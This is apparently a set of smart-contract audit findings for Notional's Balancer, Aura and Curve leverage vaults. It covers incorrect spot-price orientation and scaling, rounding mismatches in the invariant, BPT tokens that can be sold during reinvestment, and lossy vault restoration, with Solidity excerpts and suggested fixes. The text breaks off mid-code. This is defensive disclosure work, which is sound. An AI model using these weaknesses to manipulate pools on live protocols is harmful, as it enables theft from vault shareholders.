The spot prices used during the comparison are different, which might result in the trade proceeding even if the pool is manipulated, leading to a loss of assets.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nLine 91 above calls the `SPOT_PRICE.getComposableSpotPrices` function to fetch the spot prices. Within the function, it relies on the `StableMath._calcSpotPrice` function to compute the spot price. Per the comments of this function, `spot price of token Y in token X` and `spot price Y/X` mean the price is expressed as Y (base) / X (quote), i.e., secondary (base) / primary (quote).\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nThe above spot price will be used within the `_calculateLPTokenValue` function to compare with the oracle price to detect any potential pool manipulation. However, the oracle price returned is in primary (base) / secondary (quote) format. As such, the comparison between the spot price (secondary-base/primary-quote) and oracle price (primary-base/secondary-quote) will be incorrect.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _calculateLPTokenValue(\\n..SNIP..\\n uint256 price = _getOraclePairPrice(primaryToken, address(tokens[i]));\\n\\n // Check that the spot price and the oracle price are near each other. If this is\\n // not true then we assume that the LP pool is being manipulated.\\n uint256 lowerLimit = price * (Constants.VAULT_PERCENT_BASIS - limit) / Constants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = price * (Constants.VAULT_PERCENT_BASIS + limit) / Constants.VAULT_PERCENT_BASIS;\\n if (spotPrices[i] < lowerLimit || upperLimit < spotPrices[i]) {\\n revert Errors.InvalidPrice(price, spotPrices[i]);\\n }\\n```\\n
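To illustrate the orientation mismatch with hypothetical numbers, assume a pair where, on an honest and unmanipulated pool, one secondary token trades for 1.15 primary tokens:\\n```\\n// Hypothetical pair: 1 secondary token trades for 1.15 primary tokens\\nspotPrice (secondary per primary)   = 1.15e18\\noraclePrice (primary per secondary) = 1e18 * 1e18 / 1.15e18 ~= 0.87e18\\n```\\n\\nThe two values differ by over 30% even though nothing is wrong with the pool, so the deviation check ends up comparing prices quoted in opposite directions rather than detecting manipulation.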
Consider verifying with the Balancer team whether the comment of the `StableMath._calcSpotPrice` function is aligned with its implementation.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use an existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (with the fee excluded), to compute the spot price.
If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.
```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n
BPT LP Token could be sold off during re-investment
medium
BPT LP Tokens could be sold off during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault\\nWithin the `ConvexStakingMixin._isInvalidRewardToken` function, the implementation ensures that the LP Token (CURVE_POOL_TOKEN) is not intentionally or accidentally sold during the reinvestment process.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the same control was not implemented for the Balancer/Aura code. As a result, it is possible for the LP token (BPT) to be sold during reinvestment. Note that for non-composable Balancer pools, the pool tokens do not include the BPT. Thus, the BPT needs to be explicitly listed within the `_isInvalidRewardToken` function.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n
Ensure that the LP tokens cannot be sold off during re-investment.\\n```\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n// Add the line below\\n token == BALANCER_POOL_TOKEN ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n
LP tokens (BPT) might be accidentally or maliciously sold off by the bots during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault
```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n
Fewer than expected LP tokens if the pool is imbalanced during vault restoration
high
The vault restoration function intends to perform a proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This results in fewer pool tokens in return due to a sub-optimal trade, eventually leading to a loss for the vault shareholders.\\nPer the comment on Line 498, it was understood that the `restoreVault` function intends to deposit the withdrawn tokens back into the pool proportionally.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n\\nThe main reason to join with all the pool's tokens in exact proportions is to minimize the price impact or slippage of the join. If the deposited tokens are imbalanced, they are often swapped internally within the pool, incurring slippage or fees.\\nHowever, the concept of a proportional join minimizing slippage does not always hold with the current implementation of the `restoreVault` function.\\nProof-of-Concept\\nAt T0, assume that a pool is perfectly balanced (50%-50%) with 1000 WETH and 1000 stETH.\\nAt T1, an emergency exit is performed; the LP tokens are redeemed for the underlying pool tokens proportionally, and 100 WETH and 100 stETH are redeemed.\\nAt T2, due to certain events or ongoing issues with the pool (e.g., attacks, bugs, mass withdrawals), the pool becomes imbalanced (30%-70%) with 540 WETH and 1260 stETH.\\nAt T3, the vault re-enters the withdrawn tokens to the pool proportionally with 100 WETH and 100 stETH. Since the pool is already imbalanced, attempting to enter the pool proportionally (50% WETH and 50% stETH) will incur additional slippage and penalties, resulting in fewer LP tokens returned.\\nThis issue affects both Curve and Balancer pools since joining an imbalanced pool will always incur a loss.\\nExplanation of an imbalanced pool\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g., it results in fewer pool LP tokens received).\\nIn a Curve pool, there are penalties/bonuses when depositing. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). 
On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.
Consider providing the callers the option to deposit the withdrawn tokens in a "non-proportional" manner if the pool has become imbalanced. For instance, the function could allow the caller to swap the withdrawn tokens on external DEXs within the `restoreVault` function to achieve the proportion that minimizes the penalty and slippage when re-entering the pool, similar to the approach in the vault's reinvest function. A rough sketch of this direction follows below.
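The sketch below assumes hypothetical `TradeParams` and `_executeTrade` stand-ins for the vault's existing trade-execution plumbing; the whitelisting and validation of the supplied trades is omitted:\\n```\\nfunction restoreVault(\\n    uint256 minPoolClaim, bytes calldata data\\n) external override whenLocked onlyNotionalOwner {\\n    (IERC20[] memory tokens, /* */) = TOKENS();\\n    uint256[] memory amounts = new uint256[](tokens.length);\\n\\n    // Optionally rebalance the withdrawn tokens toward the pool's current proportions\\n    // before re-entering, instead of forcing a strictly proportional join.\\n    if (data.length > 0) {\\n        TradeParams[] memory trades = abi.decode(data, (TradeParams[]));\\n        for (uint256 i; i < trades.length; i++) _executeTrade(trades[i]);\\n    }\\n\\n    for (uint256 i; i < tokens.length; i++) {\\n        if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n        amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n    }\\n\\n    uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n    // ... remainder identical to the existing implementation\\n}\\n```\\n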
There is no guarantee that a pool will always be balanced. Historically, there have been multiple instances where the largest Curve pool (stETH/ETH) has become imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal; the deposit results in fewer LP tokens than possible because of the deposit penalty or the slippage from internal swaps.\\nThe side effect is that the vault restoration will return fewer pool tokens due to the sub-optimal trade, eventually leading to a loss of assets for the vault shareholders.
```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n
Rounding differences when computing the invariant
high
The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe Leverage Vault's vendored StableMath library is based on an old version of Balancer's `StableMath._calculateInvariant`, which allows the caller to specify whether the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `BalancerSpotPrice._calculateStableMathSpotPrice` function, the invariant is computed rounding up, per Line 90 below:\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n```\\n\\nThe new Composable Pool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down. 
Following is the StableMath.sol of one of the popular composable pools on Arbitrum that uses the new StableMath library:\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n ..SNIP..\\n```\\n\\nThus, Notional rounds up when calculating the invariant, while Balancer's Composable Pool rounds down when calculating the invariant. This inconsistency will result in the vault computing a different invariant, and therefore a different spot price, than the pool's own calculation implies.
To avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's Composable Pool and Notional's leverage vault are aligned, and the implementation of the StableMath functions is the same between them.
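As an interim measure (a sketch only, assuming the vault keeps its vendored copy of the old library), the call site in `BalancerSpotPrice._calculateStableMathSpotPrice` could at least mirror the pool's rounding direction:\\n```\\nuint256 invariant = StableMath._calculateInvariant(\\n    ampParam, StableMath._balances(scaledPrimary, secondary), false // round down, matching the pool's newer StableMath\\n);\\n```\\n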
The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.
```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n
Incorrect scaling of the spot price
high
The incorrect scaling of the spot price leads to the incorrect spot price, which is later compared with the oracle price.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nPer the comment and source code at Lines 97 to 103, the `SPOT_PRICE.getComposableSpotPrices` is expected to return the spot price in native decimals.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nThe `getComposableSpotPrices` function in turn calls the `_calculateStableMathSpotPrice` function. When the primary and secondary balances are passed into the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions, they are scaled up to 18 decimals precision as StableMath functions only work with balances that have been normalized to 18 decimals.\\nAssume the following state:\\nPrimary Token = USDC (6 decimals)\\nSecondary Token = DAI (18 decimals)\\nPrimary Balance = 100 USDC (=100 * 1e6)\\nSecondary Balance = 100 DAI (=100 * 1e18)\\nscalingFactors[USDC] = 1e12 * Fixed.ONE (1e18) = 1e30\\nscalingFactors[DAI] = 1e0 * Fixed.ONE (1e18) = 1e18\\nThe price between USDC and DAI is 1:1\\nAfter scaling the primary and secondary balances, the scaled balances will be as follows:\\n```\\nscaledPrimary = balances[USDC] * scalingFactors[USDC] / BALANCER_PRECISION\\nscaledPrimary = 100 * 1e6 * 1e30 / 1e18\\nscaledPrimary = 100 * 1e18\\n\\nscaledSecondary = balances[DAI] * scalingFactors[DAI] / BALANCER_PRECISION\\nscaledSecondary = 100 * 1e18 * 1e18 / 1e18\\nscaledSecondary = 100 * 1e18\\n```\\n\\nThe spot price returned from the `StableMath._calcSpotPrice` function at Line 93 will be `1e18` (1:1).\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n\\n // Remove scaling factors from spot price\\n spotPrice = spotPrice * scalingFactors[primaryIndex] / scalingFactors[index2];\\n }\\n```\\n\\nSubsequently, in Line 96 above, the code attempts to remove the scaling factor from the spot price (1e18).\\n```\\nspotPrice = spotPrice * scalingFactors[USDC] / scalingFactors[DAI];\\nspotPrice = 1e18 * 1e30 / 1e18\\nspotPrice = 1e30\\nspotPrice = 1e12 * 1e18\\n```\\n\\nThe 
`spotPrice[DAI-Secondary]` is not denominated in native precision after the scaling. The `SPOT_PRICE.getComposableSpotPrices` will return the following spot prices:\\n```\\nspotPrice[USDC-Primary] = 0\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe returned spot prices will be scaled to POOL_PRECISION (1e18). After the scaling, the spot price remains the same:\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * POOL_PRECISION / DAI_Decimal\\nspotPrice[DAI-Secondary] = 1e12 * 1e18 * 1e18 / 1e18\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe converted spot prices will be passed into the `_calculateLPTokenValue` function. Within the `_calculateLPTokenValue` function, the oracle price for DAI<>USDC will be `1e18`. From here, the `spotPrice[DAI-Secondary]` (1e12 * 1e18) is significantly different from the oracle price (1e18), which will cause the pool manipulation check to revert.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n
The spot price returned from `StableMath._calcSpotPrice` is denominated in 1e18 (POOL_PRECISION) since the inputted balances are normalized to 18 decimals. The scaling factors are used to normalize a balance to 18 decimals. By dividing or scaling down the spot price by the scaling factor, the native spot price will be returned.\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * Fixed.ONE / scalingFactors[DAI];\\nspotPrice = 1e18 * Fixed.ONE / (1e0 * Fixed.ONE)\\nspotPrice = 1e18 * 1e18 / (1e0 * 1e18)\\nspotPrice = 1e18\\n```\\n
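In code form, the descaling step in `_calculateStableMathSpotPrice` would then divide only by the secondary token's scaling factor (a sketch, assuming `BALANCER_PRECISION` equals `Fixed.ONE` = 1e18):\\n```\\n// The spot price coming out of StableMath is already expressed on 18-decimal balances,\\n// so only the secondary token's scaling factor needs to be removed.\\nspotPrice = spotPrice * BALANCER_PRECISION / scalingFactors[index2];\\n```\\n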
The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards).\\nIf the spot price is incorrect, it might potentially result in the following:\\nFailure to detect the pool has been manipulated, resulting in the trade executing against the manipulated pool and leading to a loss of assets.\\nUnintended reverts due to false positives, breaking core functionalities of the protocol that rely on the `_checkPriceAndCalculateValue` function.\\nThe affected `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning or reverts unexpectedly, the protocol will not be able to reinvest, leading to a loss of value for the vault shareholders.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.
```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n
Incorrect Spot Price
high
Multiple discrepancies between the implementation of the Leverage Vault's `_calcSpotPrice` function and the Balancer SDK were observed, which indicate that the computed spot price is incorrect.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe `BalancerSpotPrice._calculateStableMathSpotPrice` function relies on `StableMath._calcSpotPrice` to compute the spot price of two tokens.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n uint256 b = Math.mul(invariant, a).sub(invariant);\\n\\n uint256 axy2 = Math.mul(a * 2, balanceX).mulDown(balanceY); // n = 2\\n\\n // dx = a.x.y.2 + a.y^2 - b.y\\n uint256 derivativeX = axy2.add(Math.mul(a, balanceY).mulDown(balanceY)).sub(b.mulDown(balanceY));\\n\\n // dy = a.x.y.2 + a.x^2 - b.x\\n uint256 derivativeY = axy2.add(Math.mul(a, 